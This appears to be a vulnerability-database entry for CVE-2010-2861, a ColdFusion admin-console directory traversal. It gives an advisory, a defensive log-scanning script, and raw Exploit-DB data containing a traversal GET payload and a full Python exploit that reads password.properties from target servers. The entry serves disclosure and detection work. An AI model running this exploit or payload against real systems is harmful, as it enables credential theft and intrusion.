Vendor: ColdFusion
By: leo
CVSS: 7.5 (HIGH)
Vulnerability type: Directory Traversal
CWE: 22
Product Name: ColdFusion
Affected Version From: Adobe ColdFusion 8.0 and earlier versions
Affected Version To: Adobe ColdFusion 8.0 and earlier versions
Patch Exists: YES
Related CWE: CVE-2010-2861
CPE: a:adobe:coldfusion:8.0
Other Scripts: N/A
Tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
CVSS Metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.component:"Adobe ColdFusion"', 'vendor': 'adobe', 'product': 'coldfusion'}
Platforms Tested: None
Year: 2010

CVE-2010-2861 – Adobe ColdFusion Unspecified Directory Traversal Vulnerability

Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.

Mitigation:

Adobe has released a security bulletin and patch to address this issue. Users are advised to apply the patch as soon as possible.
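A log-side check for the traversal described above, added here as an example and not part of the advisory or the Exploit-DB entry: it flags requests to CFIDE .cfm pages whose locale parameter, after percent-decoding, carries a traversal sequence or the %00 truncation used in the public payload. The combined-log format, the sample entries, and the choice to match any .cfm page under /CFIDE/ (broader than the five pages named in the advisory) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# Only the quoted request line of a combined-format access log entry is needed.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    # Percent-decode repeatedly (bounded) so double-encoded values surface too.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def locale_traversal_reason(target):
    """Why a request target looks like CVE-2010-2861 abuse, or None.
    Any .cfm page under /CFIDE/ is checked (an assumption, broader than the five
    pages in the advisory); the signal is a locale value with '../' or a NUL byte."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if not (path.startswith("/cfide/") and path.endswith(".cfm")):
        return None
    reasons = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
        value = fully_decode(raw)
        if "../" in value or "..\\" in value:
            reasons.append("path traversal in locale")
        if "\x00" in value:  # %00 truncates the locale-file suffix
            reasons.append("NUL byte in locale")
    return ", ".join(reasons) or None

def scan_access_log(lines):
    """Return (line_no, method, target, reason) for suspicious requests. Only GET
    query strings are visible: the POST form of the exploit carries locale in
    the body, which a standard access log does not record."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        reason = locale_traversal_reason(m.group("target")) if m else None
        if reason:
            hits.append((n, m.group("method"), m.group("target"), reason))
    return hits

# Constructed sample entries (not real traffic; RFC 5737 test addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Aug/2010:10:12:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 5120',
    '203.0.113.5 - - [13/Aug/2010:10:12:05 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Aug/2010:10:13:00 +0000] "GET /cfide/administrator/settings/mappings.cfm?locale=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 880',
    '198.51.100.7 - - [13/Aug/2010:10:13:04 +0000] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120',
]
```

Because the POST variant is invisible in access logs, pair this with request-body inspection at a WAF or reverse proxy, or simply restrict /CFIDE/administrator/ to trusted addresses in addition to patching.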

Exploit-DB raw data:

# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"


#!/usr/bin/python

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

# leo 13.08.2010

import sys
import socket
import re

# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")

post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

locale=%%00%s%%00a"""

def main():
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return
    
    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]

    for f in filenames:
        print "------------------------------"
        print "trying", f

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.send(post % (f, host, len(path) + 14, path))

        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s
       
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print m.groups(0)[0]
            print "------------------------------"

if __name__ == '__main__':
    main()